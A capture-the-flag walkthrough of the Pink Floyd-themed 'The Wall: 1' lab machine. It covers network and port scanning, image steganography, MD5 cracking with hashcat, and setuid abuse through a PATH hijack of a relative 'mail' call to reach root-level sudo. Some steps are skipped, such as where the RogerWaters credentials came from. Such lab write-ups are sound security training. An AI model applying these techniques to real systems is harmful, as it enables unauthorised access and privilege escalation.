“In 1965, one of the most influential bands of our times was formed... Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.
Your challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!” – Xerubus
For more information and the OVA file download, please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.130/24)
Target: The Wall: 1 (10.1.1.148/24)
Vulnerability & Exploit
Hidden information disclosure
Image steganography
Morse code decoding
Local privilege escalation via setuid/setgid binaries
Method
Scan the network to discover the target server [arp-scan]
Sniff the local LAN for any suspicious traffic [wireshark]
Port-scan the target several times to discover running services and open ports [masscan && nmap]
Reveal hidden information from source code and images [steghide]
Crack the hashes found and log in to SSH on the target machine [hashcat]
Enumerate and exploit setuid/setgid files to get ROOT
Tools
All the tools used here can be found in Kali Linux
Using arp-scan as a routine step to detect the target’s IP address (10.1.1.148 in this case).
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:fd:d1:6b VMware, Inc.
10.1.1.148 00:0c:29:31:6b:24 VMware, Inc.
10.1.1.254 00:50:56:f5:74:35 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 3.314 seconds (77.25 hosts/sec). 4 responded
10.1.1.148 is our Target!
Then run masscan to detect open ports on the target (masscan is much faster than nmap for a full port scan, so I use it for the full scan and then use nmap for a deep scan of the discovered ports).
However, this time nothing was found. It sounds like they are behind ‘the Wall’…:`(
Well, it is weird for a machine to have no ports open, so I decided to monitor the local LAN to see whether the target machine generates any suspicious network traffic.
Here it is! It looks like the target machine is trying to reach TCP port 1337 on my host, so I set up nc to listen on port 1337 and received the following:
root@kali:~# nc -lvvnp 1337
listening on [any]1337 ...
connect to [10.1.1.130] from (UNKNOWN)[10.1.1.148] 43892
[ASCII-art banner]
The Wall by @xerubus
-= Welcome to the Machine =-
If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice
sent 0, rcvd 1066 : Connection reset by peer
However, the connection was closed automatically as soon as we received the information above. After being stuck for a while, I decided to re-run the port scan. Surprisingly, this time TCP port 80 is open!
root@kali:~# masscan -p1-65535 10.1.1.148/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-06 04:55:02 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.148
By checking the source code of the web page, I found an interesting HEX string at the bottom: 737465673d3333313135373330646262623337306663626539373230666536333265633035
<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>
<!--
If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall
Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork.
737465673d3333313135373330646262623337306663626539373230666536333265633035
-->
After HEX decoding we get steg=33115730dbbb370fcbe9720fe632ec05. The first thing that came to mind when I saw the keyword steg was steganography: some information is hidden in an image file. So far, the only image file downloaded from the web page is pink_floyd.jpg.
I first ran steghide with the password 33115730dbbb370fcbe9720fe632ec05 but could not extract anything… so I guessed it is an MD5 hash, used hashcat with the rockyou wordlist to crack it, and found the password: divisionbell.
...truncate...
Added hashes from file stegkey.txt: 1 (1 salts)
Activating quick-digest mode for single-hash
NOTE: press enter for status-screen
33115730dbbb370fcbe9720fe632ec05:divisionbell <-- here is the cracked password!
All hashes have been recovered
Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 31.00M words
Progress..: 2063664/3627099 (56.90%)
Running...: --:--:--:--
Estimated.: --:--:--:--
Started: Sun Dec 6 00:12:55 2015
Stopped: Sun Dec 6 00:13:08 2015
Then use the new cracked password to extract hidden information from the image file:
root@kali:~/the_wall# steghide --extract -p divisionbell -sf pink_floyd.jpg
wrote extracted data to "pink_floyd_syd.txt".
root@kali:~/the_wall# cat pink_floyd_syd.txt
Hey Syd,
I hear you're full of dust and guitars?
If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0
Roger
Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.
root@kali:~/the_wall#
From the email file we notice a key, U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0, which has two parts separated by |: the first is base64 encoded and the second is an MD5 hash.
After decoding and cracking, the first part is SydBarrett and the second part is pinkfloydrocks. This must be a login credential, but the question is where to use it?!
I made a couple of attempts against the web application but all failed (tried nikto, dirbuster, etc.)… Then I guessed that a new port might have opened, just as happened with port 80, so I re-ran the port scan once more.
Woooo, I was right! masscan discovered a new port, 1965!
root@kali:~# masscan -p1-65535 10.1.1.148/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-06 05:30:16 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.148
Discovered open port 1965/tcp on 10.1.1.148
Then I run nmap to do a further scan for these two ports.
# Nmap 6.49BETA5 scan initiated Sun Dec 6 00:32:59 2015 as: nmap -v -sV -O -A -p80,1965 -oN 10.1.1.148_nmap.txt 10.1.1.148
Nmap scan report for 10.1.1.148
Host is up (0.00069s latency).
PORT STATE SERVICE VERSION
80/tcp open http OpenBSD httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open ssh OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
| 2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_ 256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
... truncate ...
From the scanning result, we know that 1965 is running SSH.
Then I tried an SSH login on port 1965 with SydBarrett as the username and pinkfloydrocks as the password, but… it failed… the reason being "This service allows sftp connections only." T.T
root@kali:~/the_wall# ssh SydBarrett@10.1.1.148 -p1965
The authenticity of host '[10.1.1.148]:1965 ([10.1.1.148]:1965)' can't be established.
ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.1.1.148]:1965' (ECDSA) to the list of known hosts.
SydBarrett@10.1.1.148's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 10.1.1.148 closed.
root@kali:~/the_wall# ssh RogerWaters@10.1.1.148 -p 1965
RogerWaters@10.1.1.148's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
[ASCII-art banner]
$ id
uid=1002(RogerWaters) gid=1002(RogerWaters) groups=1002(RogerWaters)
$ pwd
/home/RogerWaters
$
Now we are in; the next step is to escalate privileges.
After enumerating the file system, I found the following.
$ ls -al /home
total 28
drwxr-xr-x 7 root wheel 512 Oct 24 17:36 .
drwxr-xr-x 13 root wheel 512 Oct 24 18:03 ..
drwx------ 4 DavidGilmour DavidGilmour 512 Oct 28 09:28 DavidGilmour
drwx------ 3 NickMason NickMason 512 Aug 8 00:33 NickMason
drwx------ 3 RichardWright RichardWright 512 Nov 27 02:02 RichardWright
drwx------ 3 RogerWaters RogerWaters 512 Oct 28 09:29 RogerWaters
drwxr-xr-x 4 root SydBarrett 512 Oct 24 18:03 SydBarrett
It looks like there are 5 users on the system and we already have 2, so most likely we need to move through the others before getting ROOT.
Then we look for files with the setuid or setgid bit set that are owned by those three users, and we find:
$ find / -perm -u=s -type f -user DavidGilmour 2>/dev/null
/usr/local/bin/shineon
$ find / -perm -g=s -type f -user NickMason 2>/dev/null
/usr/local/bin/brick
$ ls -al /usr/local/bin/shineon
-rwsr-s--- 1 DavidGilmour RichardWright 7524 Oct 25 07:58 /usr/local/bin/shineon
$ ls -al /usr/local/bin/brick
-rws--s--x 1 NickMason NickMason 7291 Aug 8 00:33 /usr/local/bin/brick
Cool!! Anyone can run /usr/local/bin/brick and it has the setuid bit set!
Run it and give the correct answer (which should not be a problem if you are familiar with Pink Floyd), and I am now Nick Mason!
$ /usr/local/bin/brick
What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!
Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ id
uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters)
$ whoami
NickMason
$
Checking NickMason’s home folder, there is nothing interesting except another jpg file. I downloaded it to my Kali and tried to open it, but it is not a JPEG file… it is an Ogg audio file!
root@kali:~/the_wall# display nick_mason_profile_pic.jpg
display: Not a JPEG file: starts with 0x4f 0x67 `nick_mason_profile_pic.jpg' @ error/jpeg.c/JPEGErrorHandler/322.
root@kali:~/the_wall# file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I
root@kali:~/the_wall#
Open it and listen carefully: there is Morse code playing in the background. After running some audio analysis tools to carve the Morse code out (for more details please check Arr0way’s walkthrough):
Decoding the Morse code online gives the plaintext RICHARDWRIGHT1943FARFISA. So now we have a new login credential: username RichardWright and password 1943farfisa.
Right, now I can su to Richard successfully!
$ su RichardWright
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)
$ whoami
RichardWright
Now let’s go back to the other setuid file, /usr/local/bin/shineon, which can be run by RichardWright:
$ ls -al /usr/local/bin/shineon
-rwsr-s--- 1 DavidGilmour RichardWright 7524 Oct 25 07:58 /usr/local/bin/shineon
After running the program, we can see that it calls system commands such as ping and mail. Let’s check whether there is a basic coding error we can exploit for privilege escalation.
Running strings on the binary shows that it calls the command mail without specifying an absolute path (the other commands use absolute paths):
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail
Now, it’s time to move to David!
First, create a symbolic link to /bin/sh named mail in the world-writable directory /tmp, then override the $PATH environment variable so that /tmp is searched first.
$ /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$ pwd
mail: pwd: can't get current directory - Permission denied
$ whoami
DavidGilmour
$ cd /home/DavidGilmour
$ ls -alh
total 408
drwx------ 4 DavidGilmour DavidGilmour 512B Oct 28 09:28 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 DavidGilmour DavidGilmour 87B Oct 24 17:36 .Xdefaults
-rw-r--r-- 1 DavidGilmour DavidGilmour 773B Oct 24 17:36 .cshrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 103B Oct 24 17:36 .cvsrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 398B Oct 24 17:36 .login
-rw-r--r-- 1 DavidGilmour DavidGilmour 175B Oct 24 17:36 .mailrc
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 26 11:44 .private
-rw-r--r-- 1 DavidGilmour DavidGilmour 218B Oct 24 17:36 .profile
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 28 05:16 .ssh
-rw------- 1 DavidGilmour DavidGilmour 384B Aug 8 00:33 anotherbrick.txt
-rw-r--r-- 1 DavidGilmour DavidGilmour 1022B Oct 26 08:59 bio.txt
-rwxr----- 1 DavidGilmour DavidGilmour 178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r-- 1 DavidGilmour DavidGilmour 785B Oct 27 01:43 mbox
In order to get the full privileges of user DavidGilmour, I did some enumeration: there is a jpg file in David’s home directory. Checking david_gilmour_profile_pic.jpg with strings, I found the password at the bottom: who_are_you_and_who_am_i.
After some more enumeration, I found new clues in the file anotherbrick.txt:
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond
New website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php
# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
$
Checking the new web page, this is the home page for 50 years of Pink Floyd.
After some testing of the new web page I could not find any attack surface, so I downloaded the picture and had a closer look.
There is something hidden in it: by increasing the brightness of the picture, the hidden strings become clearer and clearer.
From the picture we get a folder or path, /welcometothemachine, and a key, 50696e6b466c6f796435305965617273.
By searching for the keyword welcometothemachine, I found a setuid file owned by root!
$ find / -name 'welcometothemachine' 2>/dev/null
/var/www/htdocs/welcometothemachine
$ ls -al /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x 2 root welcometothemachine 512 Aug 8 00:33 .
drwxr-x--- 4 www welcometothemachine 512 Nov 27 01:47 ..
-rws--s--- 1 root welcometothemachine 7513 Nov 27 01:47 PinkFloyd
$
After running the file PinkFloyd and entering the answer 50696e6b466c6f796435305965617273:
$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273
Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless
Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
$
Notice the sentence "Congratulations... permission has been granted." Checking the sudo configuration, we can now run any command as any user, including ROOT!
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"
User DavidGilmour may run the following commands on thewall:
(ALL) SETENV: ALL